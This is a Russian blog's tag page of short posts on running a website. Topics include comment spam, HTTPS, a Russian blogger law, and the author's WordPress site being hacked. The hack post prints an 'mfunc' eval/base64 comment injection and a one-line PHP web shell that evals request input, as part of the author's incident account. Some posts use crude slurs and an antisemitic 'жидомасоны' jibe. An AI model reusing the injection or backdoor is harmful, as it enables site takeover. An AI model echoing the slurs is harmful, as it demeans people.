Тег ‘сайтоводство’

Новости укроспама, или про Медузу и Тинькофф-банк

Я довольно давно слежу за похождениями спамеров с украинскими IP у меня на сайте. Начиналось все с рекламы неких поддельных каталогов проституток:

http://shura.luberetsky.ru/2013/09/07/ochen-slozhnyjj-vopros/

В 2014 году те же ребята занимались рекламой поддельных “европейских” интернет-магазинов:

http://shura.luberetsky.ru/2014/04/06/evrointegraciya-ukrainskikh-spamerov-idet-polnym-khodom/

Я чуть было не констатировал полное отпадение украинских спамеров от Русского Мира™, что, признаться, добавило проблем – если до этого комментарии, написанные преимущественно на английском языке, автоматически можно было отправлять в спам с баном по IP, то теперь приходится проверять этот IP на принадлежность Украине, в надежде, что ее жители еще не ебанулись окончательно и когда-нибудь смогут писать в комментах что-то осмысленное. Впрочем, после вот таких потоков сознания в это верится все меньше и меньше.

Так вот, сегодня обнаружил среди “украинского” спама нечто новое. В комментарии рекламировались не проститутки Оренбурга, и не сомнительные магазины, и даже не было типичного для этого жанра “Putin Huilo! Slava Ukraine!” (кстати, я тут не шучу – в “генераторе комментариев”, которым пользуются эти деятели, было зашито и вот такое “приветствие”) – зато была ссылочка на “партнерский материал” модного хипстерского Тинькофф-банка на не менее модном и хипстерском “новостном” сайте “Медуза”.

Короче, мнение мое о Тинькоффе с Медузой резко испортилось.

UPD Претензии к “Медузе” частично снимаются – так как сегодня начали появляться комментарии со ссылкой на рекламный материал Тинькоффа на другом сайте – так что заказчиком кампании логично считать именно этот “банк”.

Про обязательное внедрение HTTPS

Слышал краем уха, что интернет-гиганты (читай Гугл) с прочими жидомасонами придумали хитрый план – в обязательном порядке, на всех без исключения сайтах добиться поддержки защищенного протокола HTTPS. Ну, знаете, наверное – “замочек” в адресной строке и прочая ерунда?

На этом пути возникают, конечно, курьезные поделия типа Let’s Encrypt – чудовищные с точки зрения безопасности. Понятно, почему это происходит – квалификации среднего “вебмастера”, как и бюджета среднего сайта, совершенно недостаточно для нормальной “защиты” – и вместо этого получается защита “формальная”, для галочки.

Что же будет в итоге? Будем иметь кучи сайтов с криво настроенным HTTPS, проблемы на стороне пользователей (типа устаревших корневых сертификатов) – а те же пользователи будут шустро учиться, где же в браузере находится кнопочка “забить на глюки HTTPS”. Как мне кажется, это не то, к чему надо стремиться. И как тут не вспомнить жидомасонов из первой строчки этой записи? Если нельзя “взломать” алгоритм шифрования – сделайте так, чтобы на его использование все забивали.

Про русские форумы

Думаю, все знают эту шутку?

Американский форум: ты задаешь вопрос, тебе отвечают.
Еврейский форум: тебе отвечают вопросом на вопрос.
Русский форум: тебе объясняют, что ты мудак.

Так вот, мне кажется, что ее можно дополнить еще одной строчкой, а именно:

Русский форум с многолетней историей: все три с половиной постоянных участника форума объясняют друг другу, что они мудаки.

Смелые люди

Согласно опросу, 39% пользователей Wordpress не читают, что же изменилось в установленных у них плагинах перед обновлением:

http://wptavern.com/poll-how-often-do-you-read-a-wordpress-plugins-changelog-before-updating

Хочу обратить внимание, что это не лохи какие-то, а в большинстве своем “продвинутые юзеры”, самостоятельно поставившие оный вордпресс и даже настроившие его. В общем, это все, что надо знать о существах, гордо называющих себя непонятным словом “вебмастер”.

Закон ни о чем

Прожужжали все уши новым “законом о блоггерах” (№ 97-ФЗ от 05.05.2014), который должен окончательно задушить Рунет и установить в нем кровавую диктатуру. Не поленился, нашел его текст и прочитал. Сразу предупрежу – это набор diff-ов к ФЗ “Об информации, информационных технологиях и о защите информации”, КоАП и еще всякой мелочевке. Поэтому крайне желательно открыть еще и закон № 149-ФЗ от 27.07.2006 – хотя бы статью 2 “Основные понятия”, чтобы иметь возможность соотнести юридическую терминологию с общепринятой.

97-ФЗ вносит в 149-ФЗ три новые статьи. Первая – 10.1, про “организатора распространения информации в сети “Интернет”" и его обязанности. Не вполне ясно, кто такой этот “организатор”, похоже, что имеется ввиду кто-то наподобие администратора SMTP или Jabber-сервера. Правда, под приведенное определение можно подвести кого угодно – вплоть до администратора какого-нибудь форума. И что еще хуже – обязанности “организатора” “определяются Правительством Российской Федерации”. В общем, посмотрим.

Второе нововведение, из-за которого и идут все споры – это статья 10.2, содержащая определение “блогера” (слава богу, установили “правильное” написание этого слова – хоть оно мне и не нравится). Оно опирается на очень неудачный термин “владелец сайта”, да еще и неявно вводит новое определение – “владелец страницы сайта”. Впрочем, в большинстве случаев личность “блогера” вполне ясна, а вот “права и обязанности” куда интереснее. Оказывается, блогерам нельзя нарушать законодательство РФ – а взамен им разрешается делать все, что не запрещено законодательством РФ. Нет, я не шучу – примерно так и звучит то, что написано в этой статье. Единственное новое ограничение – это обязанность разместить на сайте или странице сайта некое подобие немецкого Impressum – но в отличие от Германии, это необходимо лишь для сайтов или страниц с посещаемостью более 3000 человек в день, да и требуемой информации куда меньше – фамилия и инициалы вместе с “электронным адресом” (кстати, что это такое – неизвестно).

Статья 15.4 немножко проливает свет на то, кто такой “организатор распространения информации”. Оказывается, у него есть “информационный ресурс”, к которому имеется “доступ”, и его могут ограничить за неисполнение указанных в статье 10.1 обязанностей – по большому счету, только за отказ предоставить “информацию уполномоченным государственным органам, осуществляющим оперативно-разыскную деятельность или обеспечение безопасности Российской Федерации”. В общем, опять что-то крайне непонятное.

Следующими статьями вводятся поправки в КоАП, по которым “блогеров” и “организаторов распространения информации” будут наказывать за нарушения требований статей 10.1 и 10.2, и еще одно новшество – вводится наказание за “Воспрепятствование работе сайтов в сети “Интернет”" – в виде штрафа от 500 до 1000 рублей для граждан, 1000-2000 рублей для должностных лиц, 10000-20000 – для юридических лиц. Как мне кажется, вот это – самая интересная часть в 97-ФЗ, самое большое нововведение. Правда, я не могу вспомнить случая, чтобы кто-то препятствовал работе моего сайта – но как-то греет душу то, что теперь за это злодея могут наказать :)

По большому счету, как-то волноваться по поводу этого закона должны только “организаторы распространения информации” – да и то лишь по той причине, что их обязанности еще не определены. Но ни “блогерам”, ни тем более тем, у кого на страничке меньше 3000 посетителей в день, никаких особых неприятностей не светит. Понятно, что в этот закон заложены неслабые “мины” в виде странных определений – но и тех кошмаров, которыми нас пугают, тоже нет.

Евроинтеграция украинских спамеров идет полным ходом

Месяц назад я озаботился тем, что украинские спамеры практически перестали рекламировать сайты с проститутками в российских областных центрах:

http://shura.luberetsky.ru/2014/03/03/na-ukraine-dejjstvitelno-proiskhodit-chto-to-strashnoe/

А вот сегодня я вычистил полторы сотни комментариев с украинскими IP (преимущественно провайдеры города Ровно), где массово встречались ссылки на сомнительные интернет-магазины на “европейских” доменах (типа .co.uk, .fr, .it и так далее). Евроинтегрируются хлопцы :)

На Украине действительно происходит что-то страшное

Заметил, что почти сошел на нет поток “говнокомментов” с украинских IP-адресов. Все ушли на фронт?

Отмывание кармы и прочистка чакр

Уже довольно долго в Интернете существует сайт archive.org- в числе прочих проектов которого есть попытка создать “архив интернета” под названием Internet Archive Wayback Machine. Хотите узнать, как выглядела главная страница Яндекса в 2000 году? Набираете в тамошней строке поиска http://www.yandex.ru, выбираете дату и смотрите. Прекрасная иллюстрация принципа “что попало в интернет, остается там навсегда”.

Но, оказывается, исключить доменное имя из общедоступного “архива интернета” не просто, а очень просто. Достаточно просто запретить индексирование с помощью robots.txt – после чего страницы с сайта, в том числе и те, которые уже были заархивированы, перестают выводиться в результатах поиска. Надо ли говорить, что при этом не отслеживается смена владельца доменного имени? В общем, стереть что-то из “архива интернета” можно элементарно. Кому и зачем это может понадобиться – думайте сами.

PS Я не сомневаюсь, что заархивированные данные не удаляются и доступны тем, кому они очень нужны.

Интересная мысль

Оказывается, размещение кода какой-нибудь “Яндекс.Метрики” на “продающем” сайте может “увести” ваших клиентов к конкурентам:

http://dxdt.ru/2013/11/06/6293/

Интересный ход мыслей, но как мне кажется – куда более реальная угроза (для владельцев этих сайтов, естественно – в первую очередь), чем “они за нами следят, все пропало”. Для посетителя-клиента определенные риски тоже есть – достаточно лишь творчески посмотреть на известный пример с авиабилетами.

Идейка для сайтов со всякой “кармой”

Интересно, что будет, если превратить переполнение счетчика из бага в фичу? Предположим, у пользователей на сайте есть такой показатель, как “карма”. Если пользователь или его высказывание нам нравится – жмем плюсик, карма увеличивается на 1, если не нравится – жмем минус и карма соответственно уменьшается. Чем карма больше – тем больше у пользователя бонусов, чем меньше – тем меньше его хотят здесь видеть.

Так вот, давайте представим себе, что “карма” представлена однобайтовым целым числом и может принимать значения от -127 до 128, 128+1=-127, -127-1=128 – то есть при экстремально высоких или экстремально низких значениях “кармы” пользователь может внезапно и резко поменять свой статус.

Интересно, как это повлияет на традиции выставления “плюсов в карму” и поведение юзверей? А если еще и скрыть текущее значение от других пользователей?

Очень сложный вопрос

Спамеры-говнокомментеры оборзели, рекламируют сайты с “проститутками Казани” (а также Уфы, Оренбурга, Челябинска и прочих областных центров). При заходе на сайты можно довольно легко обнаружить, что каждая казанская блядь имеет по нескольку фотосессий на сайтах типа HungarianHoneys.com. Некоторые до того круты, что “присутствуют” одновременно в нескольких городах, удаленных друг от друга на тысячу километров.

Скажем так, я представляю механизмы получения денег порносайтом и механизмы получения денег каталогом проституток. Но в чем профит “левого” каталога с подставными жрицами продажной любви, и зачем таковые раскручивают “прогоном по комментариям” – понять затрудняюсь. Неужели расчет тривиальный, на продажу “раскрученного” домена?

А кто у нас в вики-движках разбирается?

Обнаружил в своем хозяйстве целый незаюзанный домен fuckfueleconomy.org. Имею желание перенести туда свою страничку по 3111, чуточку ее дополнив. Например, хочется сделать там “Википузию” по ремонту и обслуживанию, но так как основным сайтом для “Клуба владельцев ГАЗ-3111″ является вконтактовская группа – то очень хочется, чтобы к вики-движку максимально просто прикручивалась авторизация из “Вконтакта”. Дополнительное требование – легкость доработки дизайна странички.

В общем, что сейчас такого есть, чтоб “искаропки”?

Навальный и Google Adsense

Видел сегодня в блоке Google Adsense рекламу “предвыборно-агитационного” сайта небезызвестного блоггера. Я не сомневаюсь, что в штабе Навального все безукоризненно оформлено с бухгалтерско-юридической точки зрения – но все же, известен ли человечеству способ оплатить рекламу в Adsense, не вступая в противоречие с отечественным избирательным законодательством?

PS Дети спамеров умрут от рака.

Концерт по заявкам слушателей

Есть планы на несколько относительно больших записей в блоге:

- про “антипиратский” закон, неожиданно положительное
- про страховую медицину, и ее историю в России со времен Зурабова
- про сущность платных парковок, и почему это – совершенно ненужное явление (готово)
- про Навального (в основном – критика статьи Камиля Курмакаева на Forbes.ru) (готово)

Все они уже существуют в виде черновиков разной степени готовности, но дописывать мне их лень, так что напишите в комменты, что из этого вы хотели бы прочитать, а что нет.

PS Про выборы губернатора Московской области пост будет обязательно, скорее всего – на этих выходных.

До чего я опустился…

Делаю сайты за еду.

PS Для особо тупых – это не объявление, это констатация факта.

Подломали сайт

К сожалению, на этот раз это были не урбанисты. Вообще, политически правильно было бы обвинить последних во всех смертных грехах, начиная с поджога Рейхстага – но не в этот раз.

Ломанули довольно интересным образом, используя уязвимость в кеширующем плагине Wordpress. Как известно, популярный движок для блогов и сайтов довольно тормознут и ресурсоемок – поэтому в большинстве случаев, когда содержимое сайта представляет собой “практически статику”, достаточно создать страничку “по полной программе”, с запросами к базе, работой тупых плагинов и прочей дрянью всего лишь один раз, а затем показывать всем в течение нескольких часов копию из кеша. Казалось бы, все хорошо? Но каким-то извращенцам очень сильно понадобилась возможность обновлять части закешированной страницы. Говно вопрос! – ответили авторы кеширующих плагинов и предложили решение – “тег” mfunc. Теперь, если в коде закешированной страницы обнаруживается вот такая конструкция:

<!--mfunc function_name( 'parameter', 'another_parameter' ) -->
<!--/mfunc-->

- то при выдаче кешированной страницы выполнится PHP-код внутри этого тега. Честно говоря, я с трудом представляю сценарий, когда может понадобиться эта возможность – ну за исключением использования Wordpress, как движка не для блога (то есть нецелевого :)).

Этой фиче уже лет пять – но только в апреле этого года (!) кто-то заметил, что mfunc можно прекрасно вставить в комментарий. И тут понеслась… 27 мая у меня в блоге появился вот такой комментарий:

<!--mfunc eval(base64_decode('skipped a lot of shit')); --><!--/mfunc-->

Когда кому-то показывалась страничка с этим комментарием – то код внутри eval выполнялся, создавая в открытом на запись каталоге кеша файлик с совершенно замечательным содержанием (тоже несколько раз запакованным в base64):

ifdef($_REQUEST['abc']) eval(stripslashes($_REQUEST['abc']));

Ну вы поняли, да?

Что интересно – комментарий я заметил практически сразу. eval заменил на echo, закинул его в “Ожидающие модерации”, проверил сайт на наличие всякой дряни, ничего не нашел и решил спать спокойно. Но оказалось, что хацкер первоначальный скрипт удалил. Продолжение я увидел через несколько дней – по аномалиям в статистике сайта (заодно появились глюки в админке) – большому количеству обращений к php-скрипту с непотребным названием, типа “wxvfebf.php” (разумеется, что wxv – это Wx Vidgets, а что значит febf – я еще не придумал :)). Залез в логи, залез на FTP – и обнаружил, что говнецо неизвестный ксакеп все же отложил, заодно заменив некоторые PHP-скрипты вордпресса на что-то непотребное.

В общем, вчера от греха подальше заменил все файлы вордпресса на нормальные, из приличных источников. Возможность написания комментариев с mfunc отключил, следы пребывания ксакепа убрал. Кстати, что интересно – этот персонаж еще и пытался подобрать пароль к админке. Видимо, тоже с целью малец поднасрать.

Что дальше? Этот эпизод еще больше убеждает меня в необходимости “своего вордпресса с блекджеком и шлюхами”. Несмотря на все заявления авторов WP о том, что Wordpress “безопасен” (которые я, что характерно, читал как раз 27 мая) – убедиться в этом крайне сложно. Более того, “голый” Wordpress может быть и ничего – но он обрастает кучей плагинов, и те попросту никто и никогда не проверял ни на качество, ни на безопасность. Более того, вся эта история с mfunc – это практически сознательно заложенный бекдор.

Логичный вопрос – а почему я не обновляю Wordpress, при всех этих рассуждениях о безопасности? Причина проста – многие плагины непредсказуемо взаимодействуют с новыми версиями движка, а авторы их попросту забросили. Обновление превращается в поиск багов в довольно большой программе с невнятной архитектурой. Фактически, установленный и “настроенный под себя” Wordpress – это “форк” основной версии, а заниматься “чтением чужого кода” и поиском “что и где сломалось” не сильно интересно.

Атака на сайт

С 9 числа (лично я связываю это со своей критикой “урбанистов”) кто-то пытается подобрать админский пароль от Wordpress. Подбирают с разных IP-адресов, видимо, какой-то (полу)автоматизированной программой (для “полного автомата” скорость подбора маловата, для ручной работы – наоборот, высоковата).

В общем, если увидите тут какие-то непотребства – то записывайте это на счет урбанистов.

А это прикольно

Проходим по ссылке, смотрим.

Этический вопрос

Повадились ко мне в уютный бложик спамеры со своим наркоманским спамом. Ну там всякие соли для ванн, курительные миксы и прочий кал. При желании эти сайты можно подвести под

пропаганду употребления наркотиков и психотропных веществ, информацию о способах их производства и местах приобретения,

то есть они формально удовлетворяют критериям для включения в пресловутый реестр нехороших сайтов. Есть форма на сайте Роскомнадзора. Есть желание сдать спамеров туда.

Вопрос ко всем, кричавшим о жуткой цензуре и поднимающем голову фашизме – а вы бы так поступили, и почему?

Про организацию блога

Запилил новый тег – шок-конЬтент, для удобства поиска руки и сердца.